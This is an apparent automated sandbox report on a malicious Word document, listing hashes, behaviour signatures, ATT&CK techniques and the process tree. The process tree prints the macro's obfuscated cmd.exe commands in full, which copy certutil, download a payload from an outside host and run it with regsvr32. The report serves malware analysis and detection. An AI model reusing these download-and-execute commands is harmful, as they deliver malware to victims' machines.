b156c9ad046d0d4b174f7308bd3b965f4425b1dfa38e7dc19e6e1eb54b0b49a1

General

Target

document,07.20.doc
Size

110KB
MD5

30511605bee5a35ff80fde0de0105bd4
SHA1

8c5f42a5142a86e0ac4819f34340ac7e6ea498a2
SHA256

b156c9ad046d0d4b174f7308bd3b965f4425b1dfa38e7dc19e6e1eb54b0b49a1
SHA512

fe953141f28c7aaa59c478fb497170882ed578076d2b9e483f02b309484aa6b4447d0aa6104ef1b38efae8691740ab42b5ddca8adfd66013b7f1094042d7e623

Score

10^/10

Malware Config

Signatures

An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs

Processes:

cmd.exe

pid process

1540 cmd.exe
Loads dropped DLL 1 IoCs

Processes:

regsvr32.exe

pid process

1308 regsvr32.exe
Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

regsvr32.exe

pid process

1308 regsvr32.exe
1308 regsvr32.exe

pid	process
1540	cmd.exe

pid	process
1308	regsvr32.exe

pid	process
1308	regsvr32.exe
1308	regsvr32.exe

Suspicious use of SetWindowsHookEx 18 IoCs

Processes:

WINWORD.EXE

pid	process
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE
3932	WINWORD.EXE

Process spawned unexpected child process 2 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.execmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	3832	3932	cmd.exe	WINWORD.EXE
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	1540	3932	cmd.exe	WINWORD.EXE

Suspicious use of WriteProcessMemory 11 IoCs

Processes:

WINWORD.EXEcmd.exeregsvr32.exe

description	pid	process	target process
PID 3932 wrote to memory of 3832	3932	WINWORD.EXE	cmd.exe
PID 3932 wrote to memory of 3832	3932	WINWORD.EXE	cmd.exe
PID 3932 wrote to memory of 1540	3932	WINWORD.EXE	cmd.exe
PID 3932 wrote to memory of 1540	3932	WINWORD.EXE	cmd.exe
PID 1540 wrote to memory of 3788	1540	cmd.exe	1.exe
PID 1540 wrote to memory of 3788	1540	cmd.exe	1.exe
PID 1540 wrote to memory of 3004	1540	cmd.exe	regsvr32.exe
PID 1540 wrote to memory of 3004	1540	cmd.exe	regsvr32.exe
PID 3004 wrote to memory of 1308	3004	regsvr32.exe	regsvr32.exe
PID 3004 wrote to memory of 1308	3004	regsvr32.exe	regsvr32.exe
PID 3004 wrote to memory of 1308	3004	regsvr32.exe	regsvr32.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

Processes:

WINWORD.EXE

pid process

3932 WINWORD.EXE
3932 WINWORD.EXE
Executes dropped EXE 1 IoCs

Processes:

1.exe

pid process

3788 1.exe

pid	process
3788	1.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WINWORD.EXE

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\document,07.20.doc" /o ""
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Checks processor information in registry
PID:3932

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c set u=tutil&&call copy C:\Windows\System32\cer%u%.exe C:\ProgramData\1.exe
2⤵
- Process spawned unexpected child process
PID:3832

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c "set u=url&&call C:\ProgramData\1.exe /%u%^c^a^c^h^e^ /f^ http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp && call regsvr32 C:\ProgramData\1.tmp"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1540

C:\ProgramData\1.exe
C:\ProgramData\1.exe /urlcache /f http://8cfayv.com/bolb/jaent.php?l=liut6.cab C:\ProgramData\1.tmp
3⤵
- Executes dropped EXE
PID:3788

C:\Windows\system32\regsvr32.exe
regsvr32 C:\ProgramData\1.tmp
3⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\SysWOW64\regsvr32.exe
C:\ProgramData\1.tmp
4⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:1308

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\1.exe

Download Submit
C:\ProgramData\1.tmp

Download Submit
\ProgramData\1.tmp

Download Submit
memory/1308-8-0x0000000000000000-mapping.dmp

Download
memory/1540-3-0x0000000000000000-mapping.dmp

Download
memory/3004-6-0x0000000000000000-mapping.dmp

Download
memory/3788-4-0x0000000000000000-mapping.dmp

Download
memory/3832-2-0x0000000000000000-mapping.dmp

Download
memory/3932-0-0x000002185A3BC000-0x000002185A3BE000-memory.dmp

Filesize
8KB

Download
memory/3932-1-0x000002185A3BE000-0x000002185A3C3000-memory.dmp

Filesize
20KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads